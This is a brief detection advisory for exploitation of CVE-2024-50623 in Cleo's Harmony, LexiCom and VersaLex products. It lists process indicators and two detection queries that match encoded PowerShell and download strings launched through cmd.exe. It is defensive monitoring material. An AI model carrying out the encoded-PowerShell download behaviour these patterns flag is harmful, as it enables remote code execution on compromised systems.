Date: 12/16/2024
Severity: Medium
Summary
CVE-2024-50623 Exploitation Attempt - Cleo refers to a security vulnerability within the Cleo software suite that is being targeted by attackers. The exploitation attempt is identified by monitoring for a "cmd.exe" process launching from Cleo's software, which is often indicative of malicious activity. Additionally, a suspicious PowerShell command line associated with the process is a key sign of exploitation. This type of behavior suggests that an attacker might be attempting to execute arbitrary commands or gain unauthorized access to the system using the vulnerability.
Indicators of Compromise (IOC) List
ParentImage | '\javaw.exe' |
ParentCommandLine | - 'Harmony' - 'lexicom' - 'VersaLex' - 'VLTrader' |
Image | '\cmd.exe' |
CommandLine | - 'powershell' - ' -enc ' - ' -EncodedCommand' - '.Download' |
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Detection Query 1 | (((((resourcename in ("Sysmon") AND eventtype = "1") AND parentimage in ("\javaw.exe")) AND parentcommandline IN ("Harmony","lexicom","VersaLex","VLTrader")) AND image = "\cmd.exe") AND commandline in ("powershell","-enc ","-EncodedCommand",".Download")) |
Detection Query 2 | (((((technologygroup = "EDR") AND parentimage in ("\javaw.exe")) AND parentcommandline IN ("Harmony","lexicom","VersaLex","VLTrader")) AND image = "\cmd.exe") AND commandline in ("powershell","-enc ","-EncodedCommand",".Download")) |
Reference:
https://github.com/SigmaHQ/sigma/blob/master/rules-emerging-threats/2024/Exploits/CVE-2024-50623/proc_creation_win_exploit_cve_2024_50623_cleo.yml